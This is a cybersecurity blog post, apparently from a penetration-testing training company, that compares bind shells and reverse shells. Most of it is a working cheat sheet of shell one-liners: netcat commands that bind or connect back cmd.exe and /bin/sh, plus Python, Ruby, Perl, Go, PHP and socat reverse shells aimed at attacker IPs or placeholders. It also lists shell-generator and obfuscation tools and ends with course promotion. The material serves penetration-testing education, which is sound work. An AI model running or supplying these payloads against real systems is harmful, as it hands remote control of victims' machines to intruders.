Reverse Shell vs Bind Shell

Introduction

In a remote attack scenario, the attacker takes control of the victim's machine using the reverse or bind shell technique. This cybersecurity blog post will explore reverse and bind shells in-depth, including illustrative examples. We will clarify what constitutes a reverse and bind shell and highlight their differences. Additionally, we will examine how attackers employ these shells to launch an attack and how to generate them using available tools.

Bind Shells

An attacker triggers a bind shell on a target machine to launch a command shell that listens on a local port. The attacker then connects to the target machine on the listening port and executes commands to take control of the machine.

Attack Scenario

The attacker delivers a malicious payload to the target machine after exploiting a vulnerability such as a file upload bypass, command injection, etc. When the payload is executed, a port will be opened on the target machine, and then an attacker will connect to the open port and take control of the target machine.

Issues with Bind Shell

• Anyone can connect to the open bind shell, and an external attacker can take advantage of this scenario and take control of the target machine.

• Firewalls have strict rules for inbound traffic filtering and prevent attackers from connecting to an open port on the target machine.

• NAT/PAT translation can change the private IP address (RFC 1918) into different public IP addresses.

Bind Shell using Netcat

Netcat is a command-line interface (CLI) tool used to read/write data over TCP and UDP.

Download Netcat from here.

On Target's Machine

#Windows
 nc -lnvp 3333 -e cmd.exe
 
#Linux
 nc -lnvp 3333 -e /bin/sh

On Attacker's Machine

nc -nv 192.168.226.131 3333

Python Bind Shell

Use the below code to launch python bind shells on the target machine.

#Ipv4   
python3 -c 'import socket,os,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((“<ip>",<port>));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

#Ipv6 
python3 -c 'import socket,os,subprocess;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.bind(("<ip>",<port>,0,2));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

Reverse Shells

A reverse shell actively pushes a connection back to the attacker rather than waiting for the incoming connection. In this case, an attacker will open a local port and listen for a connection from the target machine.

Attack Scenario

The attacker delivers a malicious payload to the target machine after exploiting a vulnerability such as a file upload bypass, command injection, etc. When the payload is executed, the target will connect to the attacker on mentioned IP address & port. Then, the attacker will take control of the target machine.

Advantages of Reverse Shell

• Reverse shells remove the need for a listener on a target machine; thus, the target machine is not vulnerable to other external attackers.

• Reverse shells can use popular ports (e.g:80,443), usually allowed on egress connections from an internal to an external network, bypassing firewall restrictions.

• We don't need to specify the remote host's IP address and therefore don't have to face NAT/PAT translation.

Reverse Shell using Netcat

Netcat can be used to create a listener for incoming reverse shells.

On Target Machine

#Windows
 nc -nv 192.168.226.131 7878 -e cmd.exe
 #Linux
 nc -nv 192.168.226.131 7878 -e /bin/sh

On Attacker Machine

nc -lnvp 7878

Python Reverse Shell

Use the below code to launch python reverse shells on the target machine.

export RHOST="<IP>";export RPORT=<PORT>;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

python3  -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("IP",<PORT>));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'

Ruby Reverse Shell

Use the below code to launch ruby reverse shells on the target machine.

ruby -rsocket -e'exit if fork;c=TCPSocket.new("<IP>","<PORT>");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'

ruby -rsocket -e'f=TCPSocket.open("<IP>",<PORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

Perl Reverse Shell

Use the below code to launch Perl reverse shells on the target machine.

perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\

Go Reverse Shell

Use the below code to launch Go reverse shells on the target machine.

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","<IP>:<PORT>");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

PHP Reverse Shell

Use the below code to launch PHP reverse shells on the target machine.

php -r '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

Reverse Shell using Socat

Socat can be used to create a listener for incoming reverse shells.

On Target Machine

socat tcp-connect:192.168.0.5:4444 system:/bin/sh

On Attacker Machine

socat -d -d TCP4-LISTEN:443 STDOUT

Tool to Generate Reverse Shells

• Reverse-Shell-Generator: https://www.revshells.com
  

• Revshellgen: CLI Reverse Shell generator https://github.com/t0thkr1s/revshellgen

• Shellerator: https://github.com/ShutdownRepo/shellerator

• Shellpop: https://github.com/0x00-0x00/ShellPop

• Pyminifier: https://liftoff.github.io/pyminifier

• PEzor: https://github.com/phra/PEzor

References

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

• https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  

Register for instructor-led online courses today!

https://www.darkrelay.com/courses

Check out our free programs!

https://www.darkrelay.com/programs

Reach out to us with your custom pen testing needs at: info@darkrelay.com or WhatsApp us

Follow us on LinkedIn Twitter Facebook Instagram YouTube Pinterest.